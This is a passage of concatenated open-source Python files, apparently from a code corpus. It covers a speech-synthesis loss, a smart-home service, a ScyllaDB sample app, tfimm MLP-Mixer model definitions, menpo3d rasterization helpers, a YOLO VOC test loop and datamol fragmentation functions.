self.mae_loss = nn.L1Loss()
def forward(self, mel, mel_target, log_d_predicted, log_d_target,
p_predicted, p_target, e_predicted, e_target, src_len, mel_len):
B = mel_target.shape[0]
log_d_target.requires_grad = False
p_target.requires_grad = False
e_target.requires_grad = False
mel_target.requires_grad = False
mel_loss = 0.
d_loss = 0.
p_loss = 0.
e_loss = 0.
for b, (mel_l, src_l) in enumerate(zip(mel_len, src_len)):
mel_loss += self.mae_loss(mel[b, :mel_l, :], mel_target[b, :mel_l, :])
d_loss += self.mse_loss(log_d_predicted[b, :src_l], log_d_target[b, :src_l])
p_loss += self.mse_loss(p_predicted[b, :src_l], p_target[b, :src_l])
e_loss += self.mse_loss(e_predicted[b, :src_l], e_target[b, :src_l])
mel_loss = mel_loss / B
d_loss = d_loss / B
p_loss = p_loss / B
e_loss = e_loss / B
return mel_loss, d_loss, p_loss, e_loss
class LSGANLoss(nn.Module):
""" LSGAN Loss """
def __init__(self):
super(LSGANLoss, self).__init__()
self.criterion = nn.MSELoss()
def forward(self, r, is_real):
if is_real:
ones = torch.ones(r.size(), requires_grad=False).to(r.device)
loss = self.criterion(r, ones)
else:
zeros = torch.zeros(r.size(), requires_grad=False).to(r.device)
loss = self.criterion(r, zeros)
return loss |
src/curt/curt/modules/smarthome/smarthome_service.py | sanyaade-teachings/cep | 108 | 11090385 | """
Copyright (C) Cortic Technology Corp. - All Rights Reserved
Written by <NAME> <<EMAIL>>, 2021
"""
import traceback
import logging
from curt.base_service import BaseService
class SmartHomeService(BaseService):
def __init__(self):
super().__init__()
self.service_type = "SmartHome"
def execute_function(self, worker, data):
config_hardware = data[-1]
try:
if config_hardware:
return worker.config_control_handler(data[0])
else:
return worker.command(data[0])
except Exception as e:
logging.error(traceback.format_exc()) |
mms/python/python-datatypes/python_data_types.py | zimnx/scylla-code-samples | 158 | 11090387 | #!/bin/env python3
from pathlib import Path
from cassandra.cluster import Cluster
from cassandra import ConsistencyLevel
class App:
def __init__(self):
self.cluster = Cluster(contact_points=["scylla-node1", "scylla-node2", "scylla-node3"])
self.session = self.cluster.connect(keyspace="catalog")
self.session.default_consistency_level = ConsistencyLevel.QUORUM
self.insert_ps = self.session.prepare(
query="INSERT INTO mutant_data (first_name,last_name,address,website,picture_file) VALUES (?,?,?,?,?)"
)
self.delete_ps = self.session.prepare(query="DELETE FROM mutant_data WHERE first_name = ? and last_name = ?")
self.get_pic_ps = self.session.prepare(
query="SELECT picture_file FROM mutant_data WHERE first_name = ? and last_name = ?"
)
def show_mutant_data(self):
print("Data that we have in the catalog".center(50, "="))
result = self.session.execute(query="SELECT * FROM mutant_data")
for row in result:
print(f"{row.first_name} {row.last_name} <{list(row.picture_file.keys())[0]}")
print("=" * 50)
def add_mutant(self, first_name, last_name, address, website, picture_file):
print(f"\nAdding {first_name} {last_name} with picture <{picture_file}>...")
with open(picture_file, "rb") as mutant_pic:
data = mutant_pic.read()
self.session.execute(query=self.insert_ps,
parameters=[first_name, last_name, address, website, {picture_file: data}])
print("Added.\n")
def save_mutant_photo(self, first_name, last_name, directory=Path("/tmp")):
print(f"Saving {first_name} {last_name} picture to file...")
result = self.session.execute(query=self.get_pic_ps, parameters=[first_name, last_name])
mutant_photos = list(result)[0][0]
for file_name, picture in mutant_photos.items():
dest_dir = directory / file_name
print(f"Saving to <{dest_dir}>")
with dest_dir.open("wb") as file:
file.write(picture)
print("Done.")
def delete_mutant(self, first_name, last_name):
print(f"\nDeleting {first_name} {last_name}...")
self.session.execute(query=self.delete_ps, parameters=[first_name, last_name])
print("Deleted.\n")
def stop(self):
self.cluster.shutdown()
if __name__ == "__main__":
app = App()
app.add_mutant(first_name='Peter', last_name='Parker', address='1515 Main St',
website='http://www.facebook.com/Peter-Parker/', picture_file="peter_parker.jpg")
app.add_mutant(first_name='Maximus', last_name='Lobo', address='New York, Lobo Technologies',
website='https://en.wikipedia.org/wiki/Maximus_Lobo', picture_file="maximus_lobo.png")
app.show_mutant_data()
app.save_mutant_photo(first_name="Peter", last_name="Parker")
app.save_mutant_photo(first_name="Maximus", last_name="Lobo")
app.delete_mutant(first_name="Peter", last_name="Parker")
app.delete_mutant(first_name="Maximus", last_name="Lobo")
app.stop()
|
tfimm/architectures/mlp_mixer.py | gietema/tensorflow-image-models | 154 | 11090388 | """
MLP-Mixer, ResMLP, and gMLP models
This implementation is ported from the timm, which is based on the original
implementation from the MLP-Mixer paper.
Official JAX impl:
https://github.com/google-research/vision_transformer/blob/linen/vit_jax/models_mixer.py
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Arxiv: https://arxiv.org/abs/2105.01601
Also supporting ResMLP, and a preliminary implementation of gMLP
Code: https://github.com/facebookresearch/deit
Paper: ResMLP: Feedforward networks for image classification...
Arxiv: https://arxiv.org/abs/2105.03404
Paper: Pay Attention to MLPs
Arxiv: https://arxiv.org/abs/2105.08050
A thank you to paper authors for releasing code and weights.
Copyright 2021 <NAME>
Copyright 2021 <NAME>
"""
from dataclasses import dataclass
from typing import List, Tuple
import tensorflow as tf
from tfimm.layers import (
MLP,
DropPath,
GatedMLP,
GluMLP,
PatchEmbeddings,
norm_layer_factory,
)
from tfimm.models import ModelConfig, keras_serializable, register_model
from tfimm.utils import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
# Model registry will add each entrypoint function to this
__all__ = ["MLPMixer", "MLPMixerConfig"]
@dataclass
class MLPMixerConfig(ModelConfig):
nb_classes: int = 1000
in_channels: int = 3
input_size: Tuple[int, int] = (224, 224)
patch_size: int = 16
embed_dim: int = 512
nb_blocks: int = 16
mlp_ratio: Tuple[float, float] = (0.5, 4.0)
block_layer: str = "mixer_block"
mlp_layer: str = "mlp"
# Regularization
drop_rate: float = 0.0
drop_path_rate: float = 0.0
# Other parameters
norm_layer: str = "layer_norm_eps_1e-6"
act_layer: str = "gelu"
init_values: float = 1e-4 # Initialisation for ResBlocks
nlhb: bool = False # Negative logarithmic head bias
stem_norm: bool = False
# Parameters for inference
crop_pct: float = 0.875
interpolation: str = "bicubic"
mean: Tuple[float, float, float] = (0.5, 0.5, 0.5)
std: Tuple[float, float, float] = (0.5, 0.5, 0.5)
# Weight transfer
first_conv: str = "stem/proj"
classifier: str = "head"
@property
def nb_patches(self) -> int:
return (self.input_size[0] // self.patch_size) * (
self.input_size[1] // self.patch_size
)
class MixerBlock(tf.keras.layers.Layer):
"""
Residual Block w/ token mixing and channel MLPs
Based on: "MLP-Mixer: An all-MLP Architecture for Vision"
"""
def __init__(self, cfg: MLPMixerConfig, **kwargs):
super().__init__(**kwargs)
self.cfg = cfg
norm_layer = norm_layer_factory(cfg.norm_layer)
mlp_layer = MLP_LAYER_DICT[cfg.mlp_layer]
tokens_dim, channels_dim = [int(x * cfg.embed_dim) for x in cfg.mlp_ratio]
self.norm1 = norm_layer(name="norm1")
self.mlp_tokens = mlp_layer(
hidden_dim=tokens_dim,
embed_dim=cfg.nb_patches,
drop_rate=cfg.drop_rate,
act_layer=cfg.act_layer,
name="mlp_tokens",
)
self.drop_path = DropPath(drop_prob=cfg.drop_path_rate)
self.norm2 = norm_layer(name="norm2")
self.mlp_channels = mlp_layer(
hidden_dim=channels_dim,
embed_dim=cfg.embed_dim,
drop_rate=cfg.drop_rate,
act_layer=cfg.act_layer,
name="mlp_channels",
)
def call(self, x, training=False):
shortcut = x
x = self.norm1(x, training=training)
x = tf.transpose(x, perm=(0, 2, 1))
x = self.mlp_tokens(x, training=training)
x = tf.transpose(x, perm=(0, 2, 1))
x = self.drop_path(x, training=training)
x = x + shortcut
shortcut = x
x = self.norm2(x, training=training)
x = self.mlp_channels(x, training=training)
x = self.drop_path(x, training=training)
x = x + shortcut
return x
class ResBlock(tf.keras.layers.Layer):
"""
Residual MLP block with LayerScale
Based on: ResMLP: Feedforward networks for image classification...
"""
def __init__(self, cfg: MLPMixerConfig, **kwargs):
super().__init__(**kwargs)
self.cfg = cfg
norm_layer = norm_layer_factory(cfg.norm_layer)
mlp_layer = MLP_LAYER_DICT[cfg.mlp_layer]
self.norm1 = norm_layer(name="norm1")
self.linear_tokens = tf.keras.layers.Dense(
units=cfg.nb_patches,
name="linear_tokens",
)
self.drop_path = DropPath(drop_prob=cfg.drop_path_rate)
self.norm2 = norm_layer(name="norm2")
self.mlp_channels = mlp_layer(
hidden_dim=int(cfg.embed_dim * cfg.mlp_ratio[1]),
embed_dim=cfg.embed_dim,
drop_rate=cfg.drop_rate,
act_layer=cfg.act_layer,
name="mlp_channels",
)
def build(self, input_shape):
self.ls1 = self.add_weight(
shape=(self.cfg.embed_dim,),
initializer=tf.keras.initializers.Constant(self.cfg.init_values),
trainable=True,
name="ls1",
)
self.ls2 = self.add_weight(
shape=(self.cfg.embed_dim,),
initializer=tf.keras.initializers.Constant(self.cfg.init_values),
trainable=True,
name="ls2",
)
def call(self, x, training=False):
shortcut = x
x = self.norm1(x, training=training)
x = tf.transpose(x, perm=(0, 2, 1))
x = self.linear_tokens(x, training=training)
x = tf.transpose(x, perm=(0, 2, 1))
x = self.ls1 * x
x = self.drop_path(x, training=training)
x = x + shortcut
shortcut = x
x = self.norm2(x, training=training)
x = self.mlp_channels(x, training=training)
x = self.ls2 * x
x = self.drop_path(x, training=training)
x = x + shortcut
return x
class SpatialGatingBlock(tf.keras.layers.Layer):
"""
Residual Block with Spatial Gating
Based on: Pay Attention to MLPs - https://arxiv.org/abs/2105.08050
"""
def __init__(self, cfg: MLPMixerConfig, **kwargs):
super().__init__(**kwargs)
self.cfg = cfg
norm_layer = norm_layer_factory(cfg.norm_layer)
mlp_layer = MLP_LAYER_DICT[cfg.mlp_layer]
self.norm = norm_layer(name="norm")
self.mlp_channels = mlp_layer(
hidden_dim=int(cfg.embed_dim * cfg.mlp_ratio[1]),
embed_dim=cfg.embed_dim,
drop_rate=cfg.drop_rate,
act_layer=cfg.act_layer,
name="mlp_channels",
)
self.drop_path = DropPath(drop_prob=cfg.drop_path_rate)
def call(self, x, training=False):
shortcut = x
x = self.norm(x, training=training)
x = self.mlp_channels(x, training=training)
x = self.drop_path(x, training=training)
x = x + shortcut
return x
BLOCK_LAYER_DICT = {
"mixer_block": MixerBlock,
"res_block": ResBlock,
"spatial_gating_block": SpatialGatingBlock,
}
MLP_LAYER_DICT = {
"mlp": MLP,
"glu_mlp": GluMLP,
"gated_mlp": GatedMLP,
}
@keras_serializable
class MLPMixer(tf.keras.Model):
cfg_class = MLPMixerConfig
def __init__(self, cfg: MLPMixerConfig, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cfg = cfg
self.nb_features = cfg.embed_dim
norm_layer = norm_layer_factory(cfg.norm_layer)
block_layer = BLOCK_LAYER_DICT[cfg.block_layer]
self.stem = PatchEmbeddings(
patch_size=cfg.patch_size,
embed_dim=cfg.embed_dim,
norm_layer=cfg.norm_layer if cfg.stem_norm else "",
name="stem",
)
self.blocks = [
block_layer(cfg=cfg, name=f"blocks/{j}") for j in range(cfg.nb_blocks)
]
self.norm = norm_layer(name="norm")
self.head = (
tf.keras.layers.Dense(units=cfg.nb_classes, name="head")
if cfg.nb_classes > 0
else tf.keras.layers.Activation("linear")
)
@property
def dummy_inputs(self) -> tf.Tensor:
return tf.zeros((1, *self.cfg.input_size, self.cfg.in_channels))
@property
def feature_names(self) -> List[str]:
return (
["stem"]
+ [f"block_{j}" for j in range(self.cfg.nb_blocks)]
+ ["features_all", "features", "logits"]
)
def forward_features(self, x, training=False, return_features=False):
features = {}
x = self.stem(x, training=training)
features["stem"] = x
for j, block in enumerate(self.blocks):
x = block(x, training=training)
features[f"block_{j}"] = x
x = self.norm(x, training=training)
features["features_all"] = x
x = tf.reduce_mean(x, axis=1)
features["features"] = x
return (x, features) if return_features else x
def call(self, x, training=False, return_features=False):
features = {}
x = self.forward_features(x, training, return_features)
if return_features:
x, features = x
x = self.head(x)
features["logits"] = x
return (x, features) if return_features else x
@register_model
def mixer_s32_224():
"""
Mixer-S/32 224x224
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_s32_224",
url="[timm]",
patch_size=32,
embed_dim=512,
nb_blocks=8,
)
return MLPMixer, cfg
@register_model
def mixer_s16_224():
"""
Mixer-S/16 224x224
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_s16_224",
url="[timm]",
patch_size=16,
embed_dim=512,
nb_blocks=8,
)
return MLPMixer, cfg
@register_model
def mixer_b32_224():
"""
Mixer-B/32 224x224
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_b32_224",
url="[timm]",
patch_size=32,
embed_dim=768,
nb_blocks=12,
)
return MLPMixer, cfg
@register_model
def mixer_b16_224():
"""Mixer-B/16 224x224. ImageNet-1k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_b16_224",
url="[timm]",
patch_size=16,
embed_dim=768,
nb_blocks=12,
)
return MLPMixer, cfg
@register_model
def mixer_b16_224_in21k():
"""
Mixer-B/16 224x224. ImageNet-21k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_b16_224_in21k",
url="[timm]",
nb_classes=21843,
patch_size=16,
embed_dim=768,
nb_blocks=12,
)
return MLPMixer, cfg
@register_model
def mixer_l32_224():
"""
Mixer-L/32 224x224.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_l32_224",
url="[timm]",
patch_size=32,
embed_dim=1024,
nb_blocks=24,
)
return MLPMixer, cfg
@register_model
def mixer_l16_224():
"""
Mixer-L/16 224x224. ImageNet-1k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_l16_224",
url="[timm]",
patch_size=16,
embed_dim=1024,
nb_blocks=24,
)
return MLPMixer, cfg
@register_model
def mixer_l16_224_in21k():
"""
Mixer-L/16 224x224. ImageNet-21k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_l16_224_in21k",
url="[timm]",
nb_classes=21843,
patch_size=16,
embed_dim=1024,
nb_blocks=24,
)
return MLPMixer, cfg
@register_model
def mixer_b16_224_miil():
"""
Mixer-B/16 224x224. ImageNet-21k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
Weights taken from: https://github.com/Alibaba-MIIL/ImageNet21K
"""
cfg = MLPMixerConfig(
name="mixer_b16_224_miil",
url="[timm]",
patch_size=16,
embed_dim=768,
nb_blocks=12,
crop_pct=0.875,
interpolation="bilinear",
mean=(0.0, 0.0, 0.0),
std=(1.0, 1.0, 1.0),
)
return MLPMixer, cfg
@register_model
def mixer_b16_224_miil_in21k():
"""
Mixer-B/16 224x224. ImageNet-1k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
Weights taken from: https://github.com/Alibaba-MIIL/ImageNet21K
"""
cfg = MLPMixerConfig(
name="mixer_b16_224_miil_in21k",
url="[timm]",
nb_classes=11221,
patch_size=16,
embed_dim=768,
nb_blocks=12,
crop_pct=0.875,
interpolation="bilinear",
mean=(0.0, 0.0, 0.0),
std=(1.0, 1.0, 1.0),
)
return MLPMixer, cfg
@register_model
def gmixer_12_224():
"""
Glu-Mixer-12 224x224
Experiment by <NAME>, adding (Si)GLU to MLP-Mixer
"""
cfg = MLPMixerConfig(
name="gmixer_12_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=12,
mlp_ratio=(1.0, 4.0),
mlp_layer="glu_mlp",
act_layer="swish",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def gmixer_24_224():
"""
Glu-Mixer-24 224x224
Experiment by <NAME>, adding (Si)GLU to MLP-Mixer
"""
cfg = MLPMixerConfig(
name="gmixer_24_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=24,
mlp_ratio=(1.0, 4.0),
mlp_layer="glu_mlp",
act_layer="swish",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_12_224():
"""
ResMLP-12
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_12_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=12,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_24_224():
"""
ResMLP-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_24_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-5,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_36_224():
"""
ResMLP-36
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_36_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=36,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_big_24_224():
"""
ResMLP-B-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_big_24_224",
url="[timm]",
patch_size=8,
embed_dim=768,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_12_distilled_224():
"""
ResMLP-12
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_12_distilled_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=12,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_24_distilled_224():
"""
ResMLP-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_24_distilled_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-5,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_36_distilled_224():
"""
ResMLP-36
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_36_distilled_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=36,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_big_24_distilled_224():
"""
ResMLP-B-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_big_24_distilled_224",
url="[timm]",
patch_size=8,
embed_dim=768,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_big_24_224_in22ft1k():
"""
ResMLP-B-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_big_24_224_in22ft1k",
url="[timm]",
patch_size=8,
embed_dim=768,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_12_224_dino():
"""
ResMLP-12
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
Model pretrained via DINO (self-supervised) - https://arxiv.org/abs/2104.14294
"""
cfg = MLPMixerConfig(
name="resmlp_12_224_dino",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=12,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_24_224_dino():
"""
ResMLP-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
Model pretrained via DINO (self-supervised) - https://arxiv.org/abs/2104.14294
"""
cfg = MLPMixerConfig(
name="resmlp_24_224_dino",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-5,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def gmlp_ti16_224():
"""
gMLP-Tiny
Paper: Pay Attention to MLPs
Link: https://arxiv.org/abs/2105.08050
"""
cfg = MLPMixerConfig(
name="gmlp_ti16_224",
url="[timm]",
patch_size=16,
embed_dim=128,
nb_blocks=30,
mlp_ratio=(6.0, 6.0),
block_layer="spatial_gating_block",
mlp_layer="gated_mlp",
)
return MLPMixer, cfg
@register_model
def gmlp_s16_224():
"""
gMLP-Small
Paper: Pay Attention to MLPs
Link: https://arxiv.org/abs/2105.08050
"""
cfg = MLPMixerConfig(
name="gmlp_s16_224",
url="[timm]",
patch_size=16,
embed_dim=256,
nb_blocks=30,
mlp_ratio=(6.0, 6.0),
block_layer="spatial_gating_block",
mlp_layer="gated_mlp",
)
return MLPMixer, cfg
@register_model
def gmlp_b16_224():
"""
gMLP-Base
Paper: Pay Attention to MLPs
Link: https://arxiv.org/abs/2105.08050
"""
cfg = MLPMixerConfig(
name="gmlp_b16_224",
url="[timm]",
patch_size=16,
embed_dim=512,
nb_blocks=30,
mlp_ratio=(6.0, 6.0),
block_layer="spatial_gating_block",
mlp_layer="gated_mlp",
)
return MLPMixer, cfg
|
menpo3d/rasterize/base.py | apapaion/menpo3d | 134 | 11090395 | <gh_stars>100-1000
def rasterize_mesh_from_barycentric_coordinate_images(
mesh, bcoords_image, tri_indices_image
):
r"""
Renders an image of a `menpo.shape.TexturedTriMesh` or
`menpo.shape.ColouredTriMesh` from a barycentric coordinate image pair.
Note that the texture is rendered without any lighting model - think of
this as a piecewise affine warp of the mesh's texture into the image (
with z-buffering). As there is no lighting model, only meshes with
colour/texture can be used with this method (a single color for the whole
mesh would render flat with no shading).
Parameters
----------
mesh : `menpo.shape.TexturedTriMesh` or `menpo.shape.ColouredTriMesh`
The 3D mesh who's texture will be rendered to the image.
bcoords_image : `menpo.image.MaskedImage`
The per-triangle barycentric coordinates for what should be rendered
into each pixel. See :map:`rasterize_barycentric_coordinate_images`.
tri_indices_image : `menpo.image.MaskedImage`
The triangle index identifying the triangle that is visable at a pixel
after z-buffering. See :map:`rasterize_barycentric_coordinate_images`.
Returns
-------
`menpo.image.MaskedImage`
A rasterized image of the mesh.
"""
# Sample the mesh texture space to find the colors-per pixel
colours = mesh.sample_texture_with_barycentric_coordinates(
bcoords_image.as_vector(keep_channels=True).T, tri_indices_image.as_vector()
)
# Rebuild the image using the usual from_vector machinery
return tri_indices_image.from_vector(colours.T, n_channels=mesh.n_channels)
def rasterize_shape_image_from_barycentric_coordinate_images(
mesh, bcoords_image, tri_indices_image
):
r"""
Renders an XYZ shape image of a `menpo.shape.TexturedTriMesh` or
`menpo.shape.ColouredTriMesh` from a barycentric coordinate image pair.
Parameters
----------
mesh : `menpo.shape.TexturedTriMesh` or `menpo.shape.ColouredTriMesh`
The 3D mesh who's texture will be rendered to the image.
bcoords_image : `menpo.image.MaskedImage`
The per-triangle barycentric coordinates for what should be rendered
into each pixel. See :map:`rasterize_barycentric_coordinate_images`.
tri_indices_image : `menpo.image.MaskedImage`
The triangle index identifying the triangle that is visable at a pixel
after z-buffering. See :map:`rasterize_barycentric_coordinate_images`.
Returns
-------
`menpo.image.MaskedImage`
A rasterized shape image image of the mesh.
"""
# Sample the mesh texture space to find the colors-per pixel
shape_per_pixel = mesh.project_barycentric_coordinates(
bcoords_image.as_vector(keep_channels=True).T, tri_indices_image.as_vector()
)
# Rebuild the image using the usual from_vector machinery
return tri_indices_image.from_vector(
shape_per_pixel.points.T, n_channels=mesh.n_channels
)
def rasterize_mesh(mesh_in_img, image_shape):
from .cpu import rasterize_barycentric_coordinate_images
bcs = rasterize_barycentric_coordinate_images(mesh_in_img, image_shape)
return rasterize_mesh_from_barycentric_coordinate_images(mesh_in_img, *bcs)
|
yolo/vedanet/engine/_voc_test.py | hilman-dayo/ObjectDetection-OneStageDet | 331 | 11090399 | <filename>yolo/vedanet/engine/_voc_test.py
import logging as log
import torch
from torchvision import transforms as tf
from statistics import mean
import os
from .. import data as vn_data
from .. import models
from . import engine
from utils.test import voc_wrapper
__all__ = ['VOCTest']
class CustomDataset(vn_data.BramboxDataset):
def __init__(self, hyper_params):
anno = hyper_params.testfile
root = hyper_params.data_root
network_size = hyper_params.network_size
labels = hyper_params.labels
lb = vn_data.transform.Letterbox(network_size)
it = tf.ToTensor()
img_tf = vn_data.transform.Compose([lb, it])
anno_tf = vn_data.transform.Compose([lb])
def identify(img_id):
return f'{img_id}'
super(CustomDataset, self).__init__('anno_pickle', anno, network_size, labels, identify, img_tf, anno_tf)
def __getitem__(self, index):
img, anno = super(CustomDataset, self).__getitem__(index)
for a in anno:
a.ignore = a.difficult # Mark difficult annotations as ignore for pr metric
return img, anno
def VOCTest(hyper_params):
log.debug('Creating network')
model_name = hyper_params.model_name
batch = hyper_params.batch
use_cuda = hyper_params.cuda
weights = hyper_params.weights
conf_thresh = hyper_params.conf_thresh
network_size = hyper_params.network_size
labels = hyper_params.labels
nworkers = hyper_params.nworkers
pin_mem = hyper_params.pin_mem
nms_thresh = hyper_params.nms_thresh
#prefix = hyper_params.prefix
results = hyper_params.results
test_args = {'conf_thresh': conf_thresh, 'network_size': network_size, 'labels': labels}
net = models.__dict__[model_name](hyper_params.classes, weights, train_flag=2, test_args=test_args)
net.eval()
log.info('Net structure\n%s' % net)
#import pdb
#pdb.set_trace()
if use_cuda:
net.cuda()
log.debug('Creating dataset')
loader = torch.utils.data.DataLoader(
CustomDataset(hyper_params),
batch_size = batch,
shuffle = False,
drop_last = False,
num_workers = nworkers if use_cuda else 0,
pin_memory = pin_mem if use_cuda else False,
collate_fn = vn_data.list_collate,
)
log.debug('Running network')
tot_loss = []
coord_loss = []
conf_loss = []
cls_loss = []
anno, det = {}, {}
num_det = 0
for idx, (data, box) in enumerate(loader):
if (idx + 1) % 20 == 0:
log.info('%d/%d' % (idx + 1, len(loader)))
if use_cuda:
data = data.cuda()
with torch.no_grad():
output, loss = net(data, box)
key_val = len(anno)
anno.update({loader.dataset.keys[key_val+k]: v for k,v in enumerate(box)})
det.update({loader.dataset.keys[key_val+k]: v for k,v in enumerate(output)})
netw, neth = network_size
reorg_dets = voc_wrapper.reorgDetection(det, netw, neth) #, prefix)
voc_wrapper.genResults(reorg_dets, results, nms_thresh)
|
datamol/fragment/_fragment.py | hengwei-chan/fragmentation_and_assemble | 130 | 11090408 | <filename>datamol/fragment/_fragment.py
from typing import Set
from typing import Optional
from typing import Any
from rdkit import Chem
from rdkit.Chem import BRICS
from rdkit.Chem import Recap
from rdkit.Chem import rdMMPA
from rdkit.Chem.Fraggle import FraggleSim
import datamol as dm
def brics(
mol: Chem.rdchem.Mol,
singlepass: bool = True,
remove_parent: bool = False,
sanitize: bool = True,
fix: bool = True,
):
"""Run BRICS on the molecules and potentially fix dummy atoms.
Args:
mol: a molecule.
singlepass: Single pass for `BRICSDecompose`.
remove_parent: Remove parent from the fragments.
sanitize: Wether to sanitize the fragments.
fix: Wether to fix the fragments.
"""
frags = BRICS.BRICSDecompose(mol, returnMols=True, singlePass=singlepass)
frags = list(frags)
if fix:
frags = [dm.fix_mol(x) for x in frags]
if sanitize:
frags = [dm.sanitize_mol(x) for x in frags]
if remove_parent:
frags.pop(0)
frags = [x for x in frags if x is not None]
return frags
def frag(
mol: Chem.rdchem.Mol,
remove_parent: bool = False,
sanitize: bool = True,
fix: bool = True,
):
"""Generate all possible fragmentation of a molecule.
Args:
mol: a molecule.
remove_parent: Remove parent from the fragments.
sanitize: Wether to sanitize the fragments.
fix: Wether to fix the fragments.
"""
